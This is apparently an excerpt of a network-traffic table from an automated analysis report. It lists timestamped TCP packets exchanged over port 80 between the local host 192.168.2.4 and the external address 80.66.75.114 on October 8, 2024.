                                                            Oct 8, 2024 10:08:44.324001074 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.324008942 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.324009895 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.324026108 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.324029922 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.324040890 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.324057102 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.324069023 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.324069023 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.324074984 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.324089050 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.324112892 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.324112892 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.324156046 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.324208975 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.324238062 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.324254036 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.324269056 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.324285030 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.324316978 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.324316978 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.414577961 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.414593935 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.414617062 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.414633989 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.414649010 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.414694071 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.414710045 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.414762974 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.414779902 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.414794922 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.414810896 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.414819002 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.414825916 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.414819002 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.414819002 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.414916992 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.414916992 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.414916992 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.414938927 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.414954901 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.414999962 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.414999962 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.415105104 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.415158033 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.415261030 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.415309906 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.462475061 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.462491035 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.462506056 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.462589025 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.462603092 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.462619066 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.462635040 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.462693930 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.462713003 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.462718010 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.462728024 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.462766886 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.462775946 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.462786913 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.462812901 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.462825060 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.462830067 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.462862015 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.462882042 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.462884903 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.462901115 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.462937117 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.462938070 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.462944031 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.462990999 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.463043928 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.463090897 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.554878950 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.554898977 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.554924965 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.554997921 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.555033922 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.555035114 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.555035114 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.555035114 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.555049896 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.555094957 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.555113077 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.555113077 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.555136919 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.555198908 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.555214882 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.555255890 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.555260897 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.555260897 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.555272102 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.555305958 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.555342913 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.555458069 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.555473089 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.555514097 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.555515051 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.555516005 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.555530071 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.555566072 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.555574894 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.555586100 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.555622101 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.555646896 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.555694103 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.602818966 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.602837086 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.602880001 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.602896929 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.602911949 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.602926970 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.602943897 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.602968931 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.603013039 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.603013039 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.603013039 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.603013039 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.603013039 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.603013039 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.603013039 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.603130102 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.605948925 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.605966091 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.605992079 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.606008053 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.606018066 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.606024027 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.606039047 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.606054068 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.606070995 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.606091022 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.694346905 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.694387913 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.694397926 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.694413900 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.694421053 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.694428921 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.694437027 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.694473982 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.694489002 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.694505930 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.694551945 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.694569111 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.694580078 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.694617987 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.694757938 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.694773912 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.694788933 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.694809914 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.694828987 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.740495920 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.740520954 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.740536928 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.740551949 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.740555048 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.740567923 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.740582943 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.740582943 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.740582943 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.740600109 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.740621090 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.740621090 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.740634918 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.741309881 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.741323948 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.741338968 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.741353989 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.741360903 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.741360903 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.741369009 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.741383076 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.741383076 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.741384983 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.741396904 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.741401911 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.741417885 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.741420031 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.741430998 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.741432905 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.741449118 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.741461039 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.741461039 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.741481066 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.828099966 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.828125954 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.828135967 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.828197002 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.828207970 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.828218937 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.828224897 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.828350067 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.828360081 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.828376055 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.828377008 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.828393936 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.828404903 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.828414917 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.828424931 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.828433037 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.828433037 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.829004049 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.874838114 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.874866009 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.874876022 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.874881029 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.874891043 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.874901056 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.874912024 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.874999046 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.875056028 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.875058889 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.875066996 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.875077963 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.875087023 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.875097036 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.875106096 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.875116110 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.875118971 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.875125885 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.875135899 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.875144958 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.875145912 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.875175953 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.875205994 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.919286013 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.919454098 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.964693069 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.964732885 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.964749098 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.964812040 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.964834929 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.964852095 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.964853048 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.964868069 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.964884043 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.964895010 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.964900017 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.964915991 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.964962959 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.964989901 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.965006113 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.965019941 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.965034962 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.965044975 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.965051889 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.965065002 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:44.965085983 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:44.965127945 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:45.013717890 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.013732910 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.013756037 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.013771057 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.013784885 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.013799906 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.013814926 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.013842106 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:45.013880968 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.013885021 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:45.013936043 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:45.013969898 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.013984919 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.013999939 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.014014959 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.014025927 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:45.014046907 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:45.014092922 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:45.014857054 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.014895916 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.014909983 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.014925003 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.014939070 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.014954090 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.015110016 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:45.015110970 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:45.015110970 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:45.104631901 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.104648113 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.104661942 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.104676962 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.104691982 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.104767084 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:45.104856014 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:45.104984999 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.105000019 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.105015039 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.105030060 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.105045080 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.105061054 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.105077028 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.105094910 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.105109930 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.105158091 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:45.105159044 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:45.105159044 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:45.105159044 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:45.153903961 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.153961897 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.154000044 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.154125929 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:45.154125929 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:45.154146910 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.154200077 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.154210091 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:45.154248953 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.154263020 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:45.154263973 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.154279947 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.154294968 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.154309034 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:45.154310942 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.154326916 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.154330015 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:45.154342890 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.154356956 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.154371977 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.154371023 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:45.154392004 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:45.154413939 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:45.154966116 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.154983997 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.154999018 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.155014992 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.155030012 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:45.155066013 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:45.240603924 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.240622997 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.240638971 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.240725040 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.240739107 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.240753889 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.240755081 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:45.240755081 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:45.240766048 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.240782976 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.240798950 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.240808010 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:45.240833998 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:45.240833998 CEST4973080192.168.2.480.66.75.114
